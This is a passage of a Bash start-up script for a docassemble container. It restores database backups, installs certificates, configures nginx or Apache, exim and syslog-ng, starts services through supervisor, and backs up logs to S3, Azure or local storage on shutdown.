if [[ $CONTAINERROLE =~ .*:(all|sql):.* ]] && [ "$PGRUNNING" = false ] && [ "$DBTYPE" == "postgresql" ]; then
supervisorctl --serverurl http://localhost:9001 start postgres || exit 1
sleep 4
su -c "while ! pg_isready -q; do sleep 1; done" postgres
roleexists=`su -c "psql -tAc \"SELECT 1 FROM pg_roles WHERE rolname='${DBUSER:-docassemble}'\"" postgres`
if [ -z "$roleexists" ]; then
echo "create role "${DBUSER:-docassemble}" with login password '"${DBPASSWORD:-abc123}"';" | su -c psql postgres || exit 1
fi
if [ "${S3ENABLE:-false}" == "true" ] && [[ $(s4cmd ls s3://${S3BUCKET}/postgres) ]]; then
PGBACKUPDIR=`mktemp -d`
s4cmd dsync "s3://${S3BUCKET}/postgres" "$PGBACKUPDIR"
elif [ "${AZUREENABLE:-false}" == "true" ] && [[ $(python -m docassemble.webapp.list-cloud postgres) ]]; then
echo "There are postgres files on Azure" >&2
PGBACKUPDIR=`mktemp -d`
for the_file in $(python -m docassemble.webapp.list-cloud postgres/); do
echo "Found $the_file on Azure" >&2
if ! [[ $the_file =~ /$ ]]; then
target_file=`basename "${the_file}"`
echo "Copying $the_file to $target_file" >&2
cmd_retry blob-cmd -f cp "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/${the_file}" "$PGBACKUPDIR/${target_file}"
fi
done
else
PGBACKUPDIR="${DA_ROOT}/backup/postgres"
fi
if [ -d "${PGBACKUPDIR}" ]; then
echo "Postgres database backup directory is $PGBACKUPDIR" >&2
cd "$PGBACKUPDIR"
chown -R postgres.postgres "$PGBACKUPDIR"
for db in $( ls ); do
echo "Restoring postgres database $db" >&2
pg_restore -F c -C -c $db | su -c psql postgres
done
if [ "${S3ENABLE:-false}" == "true" ] || [ "${AZUREENABLE:-false}" == "true" ]; then
cd /
rm -rf $PGBACKUPDIR
fi
cd /tmp
fi
dbexists=`su -c "psql -tAc \"SELECT 1 FROM pg_database WHERE datname='${DBNAME:-docassemble}'\"" postgres`
if [ -z "$dbexists" ]; then
echo "create database "${DBNAME:-docassemble}" owner "${DBUSER:-docassemble}" encoding UTF8;" | su -c psql postgres || exit 1
fi
elif [ "$PGRUNNING" = false ] && [ "$DBTYPE" == "postgresql" ]; then
export PGHOST="${DBHOST}"
export PGUSER="${DBUSER}"
export PGPASSWORD="${DBPASSWORD}"
export PGDATABASE="postgres"
while ! pg_isready -q; do sleep 1; done
dbexists=`psql -tAc "SELECT 1 FROM pg_database WHERE datname='${DBNAME:-docassemble}'"`
if [ -z "$dbexists" ]; then
echo "create database "${DBNAME:-docassemble}" owner "${DBUSER:-docassemble}";" | psql
fi
unset PGHOST
unset PGUSER
unset PGPASSWORD
unset PGDATABASE
fi
echo "29.5" >&2
if [ ! -f "${DA_ROOT}/certs/apache.key" ] && [ -f "${DA_ROOT}/certs/apache.key.orig" ]; then
mv "${DA_ROOT}/certs/apache.key.orig" "${DA_ROOT}/certs/apache.key"
fi
if [ ! -f "${DA_ROOT}/certs/apache.crt" ] && [ -f "${DA_ROOT}/certs/apache.crt.orig" ]; then
mv "${DA_ROOT}/certs/apache.crt.orig" "${DA_ROOT}/certs/apache.crt"
fi
if [ ! -f "${DA_ROOT}/certs/apache.ca.pem" ] && [ -f "${DA_ROOT}/certs/apache.ca.pem.orig" ]; then
mv "${DA_ROOT}/certs/apache.ca.pem.orig" "${DA_ROOT}/certs/apache.ca.pem"
fi
if [ ! -f "${DA_ROOT}/certs/nginx.key" ] && [ -f "${DA_ROOT}/certs/nginx.key.orig" ]; then
mv "${DA_ROOT}/certs/nginx.key.orig" "${DA_ROOT}/certs/nginx.key"
fi
if [ ! -f "${DA_ROOT}/certs/nginx.crt" ] && [ -f "${DA_ROOT}/certs/nginx.crt.orig" ]; then
mv "${DA_ROOT}/certs/nginx.crt.orig" "${DA_ROOT}/certs/nginx.crt"
fi
if [ ! -f "${DA_ROOT}/certs/nginx.ca.pem" ] && [ -f "${DA_ROOT}/certs/nginx.ca.pem.orig" ]; then
mv "${DA_ROOT}/certs/nginx.ca.pem.orig" "${DA_ROOT}/certs/nginx.ca.pem"
fi
if [ ! -f "${DA_ROOT}/certs/exim.key" ] && [ -f "${DA_ROOT}/certs/exim.key.orig" ]; then
mv "${DA_ROOT}/certs/exim.key.orig" "${DA_ROOT}/certs/exim.key"
fi
if [ ! -f "${DA_ROOT}/certs/exim.crt" ] && [ -f "${DA_ROOT}/certs/exim.crt.orig" ]; then
mv "${DA_ROOT}/certs/exim.crt.orig" "${DA_ROOT}/certs/exim.crt"
fi
if [ ! -f "${DA_ROOT}/certs/postgresql.key" ] && [ -f "${DA_ROOT}/certs/postgresql.key.orig" ]; then
mv "${DA_ROOT}/certs/postgresql.key.orig" "${DA_ROOT}/certs/postgresql.key"
fi
if [ ! -f "${DA_ROOT}/certs/postgresql.crt" ] && [ -f "${DA_ROOT}/certs/postgresql.crt.orig" ]; then
mv "${DA_ROOT}/certs/postgresql.crt.orig" "${DA_ROOT}/certs/postgresql.crt"
fi
python -m docassemble.webapp.install_certs "${DA_CONFIG_FILE}" || exit 1
echo "30" >&2
if [[ $CONTAINERROLE =~ .*:(all|cron):.* ]]; then
if [ -f /configdata/initial_credentials ]; then
echo "Found initial credentials" >&2
source /configdata/initial_credentials
rm -f /configdata/initial_credentials
fi
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.create_tables \"${DA_CONFIG_FILE}\"" www-data
unset DA_ADMIN_EMAIL
unset DA_ADMIN_PASSWORD
fi
echo "31" >&2
if [ -f /etc/syslog-ng/syslog-ng.conf ] && [ ! -f "${DA_ROOT}/webapp/syslog-ng-orig.conf" ]; then
cp /etc/syslog-ng/syslog-ng.conf "${DA_ROOT}/webapp/syslog-ng-orig.conf"
fi
echo "32" >&2
OTHERLOGSERVER=false
if [[ $CONTAINERROLE =~ .*:(web|celery):.* ]]; then
if [ "${LOGSERVER:-undefined}" != "undefined" ]; then
OTHERLOGSERVER=true
fi
fi
echo "33" >&2
if [[ $CONTAINERROLE =~ .*:(log):.* ]] || [ "${LOGSERVER:-undefined}" == "null" ]; then
OTHERLOGSERVER=false
fi
echo "34" >&2
if [ "$OTHERLOGSERVER" = false ] && [ -f "${LOGDIRECTORY}/docassemble.log" ]; then
chown www-data.www-data "${LOGDIRECTORY}/docassemble.log"
fi
echo "36" >&2
if [[ $CONTAINERROLE =~ .*:(all|redis):.* ]] && [ "$REDISRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start redis
fi
echo "37" >&2
if [ "${DAUPDATEONSTART:-true}" = "true" ] && [ "${DAALLOWUPDATES:-true}" == "true" ]; then
echo "Doing upgrading of packages" >&2
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.update \"${DA_CONFIG_FILE}\" initialize" www-data || exit 1
touch "${DA_ROOT}/webapp/initialized"
fi
if [ "${DAUPDATEONSTART:-true}" = "initial" ] && [ ! -f "${DA_ROOT}/webapp/initialized" ] && [ "${DAALLOWUPDATES:-true}" == "true" ]; then
echo "Doing initial upgrading of packages" >&2
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.update \"${DA_CONFIG_FILE}\" initialize" www-data || exit 1
touch "${DA_ROOT}/webapp/initialized"
fi
echo "38" >&2
if rabbitmqctl status &> /dev/null; then
RABBITMQRUNNING=true
else
RABBITMQRUNNING=false
fi
if [[ $CONTAINERROLE =~ .*:(all|rabbitmq):.* ]] && [ "$RABBITMQRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start rabbitmq
fi
echo "39" >&2
if [[ $CONTAINERROLE =~ .*:(all|celery):.* ]]; then
echo "checking if celery is already running..." >&2
if su -c "source \"${DA_ACTIVATE}\" && timeout 5s celery -A docassemble.webapp.worker status" www-data 2>&1 | grep -q `hostname`; then
echo "celery is running" >&2
CELERYRUNNING=true;
else
echo "celery is not already running" >&2
CELERYRUNNING=false;
fi
else
CELERYRUNNING=false;
fi
echo "40" >&2
if [[ $CONTAINERROLE =~ .*:(all|celery):.* ]] && [ "$CELERYRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start celery
fi
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
function backup_nginx {
if [ "${S3ENABLE:-false}" == "true" ]; then
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
cd /
rm -f /tmp/letsencrypt.tar.gz
if [ -d etc/letsencrypt ]; then
tar -zcf /tmp/letsencrypt.tar.gz etc/letsencrypt
s4cmd -f put /tmp/letsencrypt.tar.gz "s3://${S3BUCKET}/letsencrypt.tar.gz"
rm -f /tmp/letsencrypt.tar.gz
fi
fi
#if [[ $CONTAINERROLE =~ .*:(all):.* ]] || [[ ! $(python -m docassemble.webapp.list-cloud nginx) ]]; then
# s4cmd dsync "/etc/nginx/sites-available" "s3://${S3BUCKET}/nginx"
#fi
elif [ "${AZUREENABLE:-false}" == "true" ]; then
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
cd /
rm -f /tmp/letsencrypt.tar.gz
if [ -d etc/letsencrypt ]; then
tar -zcf /tmp/letsencrypt.tar.gz etc/letsencrypt
echo "Saving lets encrypt" >&2
cmd_retry blob-cmd -f cp /tmp/letsencrypt.tar.gz "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/letsencrypt.tar.gz"
rm -f /tmp/letsencrypt.tar.gz
fi
fi
#if [[ $CONTAINERROLE =~ .*:(all):.* ]] || [[ ! $(python -m docassemble.webapp.list-cloud nginx) ]]; then
# for the_file in $(find /etc/nginx/sites-available/ -type f); do
# target_file=`basename "${the_file}"`
# echo "Saving nginx" >&2
# cmd_retry blob-cmd -f cp "${the_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/nginx/${target_file}"
# done
#fi
else
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
cd /
rm -f "${DA_ROOT}/backup/letsencrypt.tar.gz"
tar -zcf "${DA_ROOT}/backup/letsencrypt.tar.gz" etc/letsencrypt
fi
#rm -rf "${DA_ROOT}/backup/nginx"
#mkdir -p "${DA_ROOT}/backup/nginx"
#rsync -auq /etc/nginx/sites-available/ "${DA_ROOT}/backup/nginx/"
fi
fi
}
echo "41.2" >&2
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]] && [ "$NGINXRUNNING" = false ]; then
if [ "${WWWUID:-none}" != "none" ] && [ "${WWWGID:-none}" != "none" ] && [ `id -u www-data` != $WWWUID ]; then
OLDUID=`id -u www-data`
OLDGID=`id -g www-data`
usermod -o -u $WWWUID www-data
groupmod -o -g $WWWGID www-data
find / -user $OLDUID -exec chown -h www-data {} \;
find / -group $OLDGID -exec chgrp -h www-data {} \;
if [[ $CONTAINERROLE =~ .*:(all|celery):.* ]] && [ "$CELERYRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 stop celery
fi
supervisorctl --serverurl http://localhost:9001 reread
supervisorctl --serverurl http://localhost:9001 update
if [[ $CONTAINERROLE =~ .*:(all|celery):.* ]] && [ "$CELERYRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start celery
fi
fi
echo "41.8" >&2
if [ "${USEHTTPS:-false}" == "true" ]; then
rm -f /etc/nginx/sites-enabled/docassemblehttp
ln -sf /etc/nginx/sites-available/docassemblessl /etc/nginx/sites-enabled/docassemblessl
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
export USE_PYTHON_3=1
if [ -f /etc/letsencrypt/da_using_lets_encrypt ]; then
certbot renew --nginx --cert-name "${DAHOSTNAME}"
else
certbot --nginx --quiet --email "${LETSENCRYPTEMAIL}" --agree-tos --no-redirect -d "${DAHOSTNAME}" && touch /etc/letsencrypt/da_using_lets_encrypt
fi
cd ~-
nginx -s stop &> /dev/null
touch /etc/letsencrypt/da_using_lets_encrypt
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
rm -f /etc/nginx/sites-enabled/docassemblessl
ln -sf /etc/nginx/sites-available/docassemblehttp /etc/nginx/sites-enabled/docassemblehttp
fi
fi
echo "41.9" >&2
backup_nginx
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
supervisorctl --serverurl http://localhost:9001 start websockets
fi
echo "46" >&2
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
supervisorctl --serverurl http://localhost:9001 start uwsgi
fi
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]]; then
if [ "$NGINXRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start nginx
fi
fi
fi
echo "42.9" >&2
# --- Apache web server configuration (only when DAWEBSERVER is "apache") ---
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
# Start from a clean ports.conf; Listen directives are re-emitted below.
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]] && [ "$APACHERUNNING" = false ]; then
rm -f /etc/apache2/ports.conf
fi
# backup_apache: persist the Apache site configs (and, when Let's Encrypt is
# in use, the whole /etc/letsencrypt tree as a tarball) to whichever backing
# store is configured: S3, Azure blob storage, or the local backup directory.
function backup_apache {
if [ "${S3ENABLE:-false}" == "true" ]; then
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
# Archive from / with a relative path so the tarball restores cleanly.
cd /
rm -f /tmp/letsencrypt.tar.gz
if [ -d etc/letsencrypt ]; then
tar -zcf /tmp/letsencrypt.tar.gz etc/letsencrypt
s4cmd -f put /tmp/letsencrypt.tar.gz "s3://${S3BUCKET}/letsencrypt.tar.gz"
rm -f /tmp/letsencrypt.tar.gz
fi
fi
# Only upload site configs from the "all" role, or when the cloud store
# has no apache folder yet (first run).
if [[ $CONTAINERROLE =~ .*:(all):.* ]] || [[ ! $(python -m docassemble.webapp.list-cloud apache) ]]; then
s4cmd dsync "/etc/apache2/sites-available" "s3://${S3BUCKET}/apache"
fi
elif [ "${AZUREENABLE:-false}" == "true" ]; then
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
cd /
rm -f /tmp/letsencrypt.tar.gz
if [ -d etc/letsencrypt ]; then
tar -zcf /tmp/letsencrypt.tar.gz etc/letsencrypt
echo "Saving lets encrypt" >&2
cmd_retry blob-cmd -f cp /tmp/letsencrypt.tar.gz "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/letsencrypt.tar.gz"
rm -f /tmp/letsencrypt.tar.gz
fi
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]] || [[ ! $(python -m docassemble.webapp.list-cloud apache) ]]; then
# blob-cmd copies one file at a time, so iterate over the site configs.
for the_file in $(find /etc/apache2/sites-available/ -type f); do
target_file=`basename "${the_file}"`
echo "Saving apache" >&2
cmd_retry blob-cmd -f cp "${the_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/apache/${target_file}"
done
fi
else
# No cloud store configured: mirror into the local backup directory.
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
cd /
rm -f "${DA_ROOT}/backup/letsencrypt.tar.gz"
tar -zcf "${DA_ROOT}/backup/letsencrypt.tar.gz" etc/letsencrypt
fi
rm -rf "${DA_ROOT}/backup/apache"
mkdir -p "${DA_ROOT}/backup/apache"
rsync -auq /etc/apache2/sites-available/ "${DA_ROOT}/backup/apache/"
fi
fi
}
echo "43" >&2
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]] && [ "$APACHERUNNING" = false ]; then
echo "Listen 80" > /etc/apache2/ports.conf
# When Python is system-managed, pin the expected mod_wsgi package version,
# installing/relinking it if the installed version differs.
if [ "${DAPYTHONMANUAL:-0}" == "0" ]; then
WSGI_VERSION=`apt-cache policy libapache2-mod-wsgi-py3 | grep '^  Installed:' | awk '{print $2}'`
if [ "${WSGI_VERSION}" != '4.6.5-1' ]; then
apt-get -q -y install libapache2-mod-wsgi-py3 &> /dev/null
ln -sf /usr/lib/apache2/modules/mod_wsgi.so-3.6 /usr/lib/apache2/modules/mod_wsgi.so
fi
fi
if [ "${DAPYTHONMANUAL:-0}" == "0" ]; then
a2enmod wsgi &> /dev/null
else
a2dismod wsgi &> /dev/null
fi
# If the host requested a specific www-data UID/GID, remap ownership of all
# existing files to the new IDs and bounce supervisor-managed services.
if [ "${WWWUID:-none}" != "none" ] && [ "${WWWGID:-none}" != "none" ] && [ `id -u www-data` != $WWWUID ]; then
OLDUID=`id -u www-data`
OLDGID=`id -g www-data`
usermod -o -u $WWWUID www-data
groupmod -o -g $WWWGID www-data
find / -user $OLDUID -exec chown -h www-data {} \;
find / -group $OLDGID -exec chgrp -h www-data {} \;
if [[ $CONTAINERROLE =~ .*:(all|celery):.* ]] && [ "$CELERYRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 stop celery
fi
supervisorctl --serverurl http://localhost:9001 reread
supervisorctl --serverurl http://localhost:9001 update
if [[ $CONTAINERROLE =~ .*:(all|celery):.* ]] && [ "$CELERYRUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start celery
fi
fi
# Trust upstream client IPs only when sitting behind an HTTPS load balancer.
if [ "${BEHINDHTTPSLOADBALANCER:-false}" == "true" ]; then
a2enmod remoteip
a2enconf docassemble-behindlb
else
a2dismod remoteip
a2disconf docassemble-behindlb
fi
# Regenerate the docassemble Apache conf from the current environment.
echo -e "# This file is automatically generated" > /etc/apache2/conf-available/docassemble.conf
if [ "${DAPYTHONMANUAL:-0}" == "3" ]; then
echo -e "LoadModule wsgi_module ${DA_PYTHON:-${DA_ROOT}/${DA_DEFAULT_LOCAL}}/lib/python3.5/site-packages/mod_wsgi/server/mod_wsgi-py35.cpython-35m-x86_64-linux-gnu.so" >> /etc/apache2/conf-available/docassemble.conf
fi
echo -e "WSGIPythonHome ${DA_PYTHON:-${DA_ROOT}/${DA_DEFAULT_LOCAL}}" >> /etc/apache2/conf-available/docassemble.conf
echo -e "Timeout ${DATIMEOUT:-60}\nDefine DAHOSTNAME ${DAHOSTNAME}\nDefine DAPOSTURLROOT ${POSTURLROOT}\nDefine DAWSGIROOT ${WSGIROOT}\nDefine DASERVERADMIN ${SERVERADMIN}\nDefine DAWEBSOCKETSIP ${DAWEBSOCKETSIP}\nDefine DAWEBSOCKETSPORT ${DAWEBSOCKETSPORT}\nDefine DACROSSSITEDOMAINVALUE *" >> /etc/apache2/conf-available/docassemble.conf
if [ "${BEHINDHTTPSLOADBALANCER:-false}" == "true" ]; then
echo "Listen 8081" >> /etc/apache2/ports.conf
a2ensite docassemble-redirect
fi
if [ "${USEHTTPS:-false}" == "true" ]; then
echo "Listen 443" >> /etc/apache2/ports.conf
a2enmod ssl
a2ensite docassemble-ssl
if [ "${USELETSENCRYPT:-false}" == "true" ]; then
export USE_PYTHON_3=1
# Marker file records that this host obtained a Let's Encrypt cert before.
if [ -f /etc/letsencrypt/da_using_lets_encrypt ]; then
certbot renew --apache --cert-name "${DAHOSTNAME}"
else
certbot --apache --quiet --email "${LETSENCRYPTEMAIL}" --agree-tos --redirect -d "${DAHOSTNAME}" && touch /etc/letsencrypt/da_using_lets_encrypt
fi
# certbot may change directories; ~- returns to the previous directory.
cd ~-
# Stop the apache instance certbot started; supervisor manages it instead.
/etc/init.d/apache2 stop
touch /etc/letsencrypt/da_using_lets_encrypt
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
fi
else
rm -f /etc/letsencrypt/da_using_lets_encrypt
a2dismod ssl
a2dissite -q docassemble-ssl &> /dev/null
fi
backup_apache
fi
echo "44" >&2
# Log-role containers serve the log viewer on port 8080 via CGI.
if [[ $CONTAINERROLE =~ .*:(log):.* ]] && [ "$APACHERUNNING" = false ]; then
echo "Listen 8080" >> /etc/apache2/ports.conf
a2enmod cgid
a2ensite docassemble-log
fi
echo "45" >&2
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
supervisorctl --serverurl http://localhost:9001 start websockets
fi
echo "46" >&2
if [[ $CONTAINERROLE =~ .*:(all|web|log):.* ]] && [ "$APACHERUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 start apache2
fi
fi
echo "47" >&2
# Warm up the web app with a throwaway local request (ignores the response;
# -k tolerates the self-signed/Let's-Encrypt cert on the HTTPS path).
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
if [ "${USEHTTPS:-false}" == "false" ]; then
curl -s http://localhost/ > /dev/null
else
curl -s -k https://localhost/ > /dev/null
fi
# Under apache, restart the server once after warm-up so it picks up the
# final configuration written above.
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
if [ "$APACHERUNNING" = false ]; then
supervisorctl --serverurl http://localhost:9001 stop apache2
supervisorctl --serverurl http://localhost:9001 start apache2
fi
fi
fi
echo "48" >&2
# Register this container with the central docassemble database.
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.register \"${DA_CONFIG_FILE}\"" www-data
echo "49" >&2
if [ "$CRONRUNNING" = false ]; then
# Prepend the container's environment variables to /etc/crontab (once) so
# cron jobs see the same CONTAINERROLE / DA_* settings as this script.
if ! grep -q '^CONTAINERROLE' /etc/crontab; then
bash -c "set | grep -e '^CONTAINERROLE=' -e '^DA_PYTHON=' -e '^DA_CONFIG=' -e '^DA_ROOT=' -e '^DAPYTHONVERSION='; cat /etc/crontab" > /tmp/crontab && cat /tmp/crontab > /etc/crontab && rm -f /tmp/crontab
fi
supervisorctl --serverurl http://localhost:9001 start cron
fi
echo "50" >&2
# --- exim4 mail configuration (mail roles with a SQL backend only) ---
# Writes /etc/exim4/dbinfo with the DB connection string exim uses to resolve
# shortened addresses, installs the matching router, and wires up TLS certs.
if [[ $CONTAINERROLE =~ .*:(all|mail):.* && ($DBTYPE = "postgresql" || $DBTYPE = "mysql") ]]; then
if [ "${DBTYPE}" = "postgresql" ]; then
cp "${DA_ROOT}/config/exim4-router-postgresql" /etc/exim4/dbrouter
if [ "${DBHOST:-null}" != "null" ]; then
echo -n 'hide pgsql_servers = '${DBHOST} > /etc/exim4/dbinfo
else
echo -n 'hide pgsql_servers = localhost' > /etc/exim4/dbinfo
fi
if [ "${DBPORT:-null}" != "null" ]; then
echo -n '::'${DBPORT} >> /etc/exim4/dbinfo
fi
# Completes the exim server spec: host[::port]/dbname/user/password
echo '/'${DBNAME}'/'${DBUSER}'/'${DBPASSWORD} >> /etc/exim4/dbinfo
fi
if [ "$DBTYPE" = "mysql" ]; then
cp "${DA_ROOT}/config/exim4-router-mysql" /etc/exim4/dbrouter
if [ "${DBHOST:-null}" != "null" ]; then
echo -n 'hide mysql_servers = '${DBHOST} > /etc/exim4/dbinfo
else
echo -n 'hide mysql_servers = localhost' > /etc/exim4/dbinfo
fi
if [ "${DBPORT:-null}" != "null" ]; then
echo -n '::'${DBPORT} >> /etc/exim4/dbinfo
fi
echo '/'${DBNAME}'/'${DBUSER}'/'${DBPASSWORD} >> /etc/exim4/dbinfo
fi
# DAQUERY maps an incoming local part to a row in the shortener table.
if [ "${DBTYPE}" = "postgresql" ]; then
echo 'DAQUERY = select short from '${DBTABLEPREFIX}"shortener where short='\${quote_pgsql:\$local_part}'" >> /etc/exim4/dbinfo
fi
if [ "${DBTYPE}" = "mysql" ]; then
echo 'DAQUERY = select short from '${DBTABLEPREFIX}"shortener where short='\${quote_mysql:\$local_part}'" >> /etc/exim4/dbinfo
fi
# TLS: prefer an explicitly provided exim cert, then fall back to the
# Let's Encrypt cert for this hostname, otherwise run without TLS.
# NOTE: chown uses the POSIX "owner:group" separator; the old "owner.group"
# dot form is deprecated and rejected by newer GNU coreutils.
if [ -f /etc/ssl/docassemble/exim.crt ] && [ -f /etc/ssl/docassemble/exim.key ]; then
cp /etc/ssl/docassemble/exim.crt /etc/exim4/exim.crt
cp /etc/ssl/docassemble/exim.key /etc/exim4/exim.key
chown root:Debian-exim /etc/exim4/exim.crt
chown root:Debian-exim /etc/exim4/exim.key
chmod 640 /etc/exim4/exim.crt
chmod 640 /etc/exim4/exim.key
echo 'MAIN_TLS_ENABLE = yes' >> /etc/exim4/dbinfo
elif [[ $CONTAINERROLE =~ .*:(all|web):.* ]] && [ "${USELETSENCRYPT:-false}" == "true" ] && [ -f "/etc/letsencrypt/live/${DAHOSTNAME}/cert.pem" ] && [ -f "/etc/letsencrypt/live/${DAHOSTNAME}/privkey.pem" ]; then
cp "/etc/letsencrypt/live/${DAHOSTNAME}/fullchain.pem" /etc/exim4/exim.crt
cp "/etc/letsencrypt/live/${DAHOSTNAME}/privkey.pem" /etc/exim4/exim.key
chown root:Debian-exim /etc/exim4/exim.crt
chown root:Debian-exim /etc/exim4/exim.key
chmod 640 /etc/exim4/exim.crt
chmod 640 /etc/exim4/exim.key
echo 'MAIN_TLS_ENABLE = yes' >> /etc/exim4/dbinfo
else
echo 'MAIN_TLS_ENABLE = no' >> /etc/exim4/dbinfo
fi
# dbinfo contains the DB password; keep it readable by root only.
chmod og-rwx /etc/exim4/dbinfo
supervisorctl --serverurl http://localhost:9001 start exim4
fi
echo "51" >&2
# --- syslog-ng configuration ---
# Either forward logs to an external log server (OTHERLOGSERVER) or act as
# the log collector locally, then start syslog-ng under supervisor.
if [[ $CONTAINERROLE =~ .*:(log):.* ]] || [ "$OTHERLOGSERVER" = true ]; then
if [ -d /etc/syslog-ng ]; then
if [ "$OTHERLOGSERVER" = true ]; then
cp "${DA_ROOT}/webapp/syslog-ng-docker.conf" /etc/syslog-ng/syslog-ng.conf
cp "${DA_ROOT}/webapp/docassemble-syslog-ng.conf" /etc/syslog-ng/conf.d/docassemble.conf
# Give the remote log server a moment before syslog-ng starts forwarding.
sleep 5s
else
rm -f /etc/syslog-ng/conf.d/docassemble.conf
cp "${DA_ROOT}/webapp/syslog-ng.conf" /etc/syslog-ng/syslog-ng.conf
fi
supervisorctl --serverurl http://localhost:9001 start syslogng
fi
fi
# deregister: shutdown handler invoked on SIGINT/SIGTERM. Removes the "ready"
# marker, deregisters the container from the central DB (and cloud store when
# configured), backs up web server logs, log directory, config, and files to
# S3 / Azure / the local backup directory, then exits the script.
function deregister {
rm -f "${DA_ROOT}/webapp/ready"
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.deregister \"${DA_CONFIG_FILE}\"" www-data
if [ "${S3ENABLE:-false}" == "true" ] || [ "${AZUREENABLE:-false}" == "true" ]; then
su -c "source \"${DA_ACTIVATE}\" && python -m docassemble.webapp.cloud_deregister" www-data
fi
# Collect web server logs into LOGDIRECTORY unless an external log server
# owns them.  NOTE: chown uses the POSIX "owner:group" separator; the old
# "owner.group" dot form is deprecated and rejected by newer GNU coreutils.
if [[ $CONTAINERROLE =~ .*:(all|web):.* ]]; then
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
#backup_apache
if [ "$OTHERLOGSERVER" = false ]; then
rsync -auq /var/log/apache2/ "${LOGDIRECTORY}/" && chown -R www-data:www-data "${LOGDIRECTORY}"
fi
fi
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
#backup_nginx
if [ "$OTHERLOGSERVER" = false ]; then
rsync -auq /var/log/nginx/ "${LOGDIRECTORY}/" && chown -R www-data:www-data "${LOGDIRECTORY}"
fi
fi
fi
if [ "${S3ENABLE:-false}" == "true" ]; then
if [[ $CONTAINERROLE =~ .*:(all|log):.* ]]; then
s4cmd dsync "${DA_ROOT}/log" "s3://${S3BUCKET}/log"
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]]; then
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
s4cmd dsync "/var/log/apache2" "s3://${S3BUCKET}/apachelogs"
fi
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
s4cmd dsync "/var/log/nginx" "s3://${S3BUCKET}/nginxlogs"
fi
fi
elif [ "${AZUREENABLE:-false}" == "true" ]; then
if [[ $CONTAINERROLE =~ .*:(all|log):.* ]]; then
# cut strips the "$LOGDIRECTORY/" prefix so blob names are relative.
let LOGDIRECTORYLENGTH=${#LOGDIRECTORY}+2
for the_file in $(find "${LOGDIRECTORY}" -type f | cut -c ${LOGDIRECTORYLENGTH}-); do
echo "Saving log file $the_file" >&2
cmd_retry blob-cmd -f cp "${LOGDIRECTORY}/${the_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/log/${the_file}"
done
fi
if [[ $CONTAINERROLE =~ .*:(all):.* ]]; then
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
# cut -c 18- strips the literal "/var/log/apache2/" prefix.
for the_file in $(find /var/log/apache2 -type f | cut -c 18-); do
echo "Saving log file $the_file" >&2
cmd_retry blob-cmd -f cp "/var/log/apache2/${the_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/apachelogs/${the_file}"
done
fi
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
# cut -c 16- strips the literal "/var/log/nginx/" prefix.
for the_file in $(find /var/log/nginx -type f | cut -c 16-); do
echo "Saving log file $the_file" >&2
cmd_retry blob-cmd -f cp "/var/log/nginx/${the_file}" "blob://${AZUREACCOUNTNAME}/${AZURECONTAINER}/nginxlogs/${the_file}"
done
fi
fi
else
# No cloud store: mirror logs, config, and uploaded files locally.
if [[ $CONTAINERROLE =~ .*:(all):.* ]]; then
if [ "${DAWEBSERVER:-nginx}" = "apache" ]; then
rm -rf "${DA_ROOT}/backup/apachelogs"
mkdir -p "${DA_ROOT}/backup/apachelogs"
rsync -auq /var/log/apache2/ "${DA_ROOT}/backup/apachelogs/"
fi
if [ "${DAWEBSERVER:-nginx}" = "nginx" ]; then
rm -rf "${DA_ROOT}/backup/nginxlogs"
mkdir -p "${DA_ROOT}/backup/nginxlogs"
rsync -auq /var/log/nginx/ "${DA_ROOT}/backup/nginxlogs/"
fi
fi
if [[ $CONTAINERROLE =~ .*:(all|log):.* ]]; then
